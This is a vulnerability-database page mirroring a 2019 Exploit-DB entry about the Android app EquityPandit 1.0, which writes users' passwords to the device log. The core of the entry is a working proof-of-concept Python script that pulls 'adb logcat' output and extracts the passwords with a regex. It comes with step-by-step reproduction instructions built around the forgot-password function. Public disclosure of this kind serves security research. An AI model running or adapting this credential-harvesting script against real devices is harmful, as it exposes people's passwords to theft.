Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

EquityPandit 1.0 - Password Disclosure

🗓️ 28 May 2019 00:00:00Reported by ManhNhoType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 123 Views

EquityPandit v1.0 - Insecure Logging, Password Disclosure in Android Ap

Code
#Exploit title: EquityPandit v1.0 - Insecure Logging
#Date:27/05/2019
#Exploit Author: ManhNho
#Software name: "EquityPandit"
#Software link: https://play.google.com/store/apps/details?id=com.yieldnotion.equitypandit
#Version: 1.0
# Category: Android apps
#Description:

   - Sometimes developers keeps sensitive data logged into the developer
   console. Thus, attacker easy to capture sensitive information like password.
   - In this application, with adb, attacker can capture password of any
   users via forgot password function.

#Requirement:

   - Santoku virtual machine
   - Android virtual machine (installed "EquityPandit" apk file)
   - Victim user/password: [email protected]/123456
   - Exploit code named capture.py in Santoku vm as below:

import subprocess
import re

process_handler = subprocess.Popen(['adb', 'logcat', '-d'],
stdout=subprocess.PIPE)
dumps = process_handler.stdout.read()
password_list = re.findall(r'password\s(.*)', dumps)
print 'Captured %i passwords! \nThey are:' %len(password_list)
for index, item in enumerate(password_list):
	print '\t#%i: %s' %(int(index)+1, item)

#Reproduce:

   - Step 1: From Santoku, use adb to connect to Android machine (x.x.x.x)

adb connect x.x.x.x


   - Step 2: From Android machine, open EquityPandit, click forgot password
   function for acccount "[email protected]" and then click submit
   - Step 3: From Santoku, execute capture.py
   - Actual: Password of "[email protected]" will be show in terminal as
   "123456"

#Demo:

https://github.com/ManhNho/Practical-Android-Penetration-Testing/blob/master/Images/Equitypandit%20PoC.wmv

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 May 2019 00:00Current
7.4High risk
Vulners AI Score7.4
equitypanditinsecure loggingpassword disclosureandroid appsexploitsantoku virtual machineandroid virtual machinecapture.pyadbdemo
123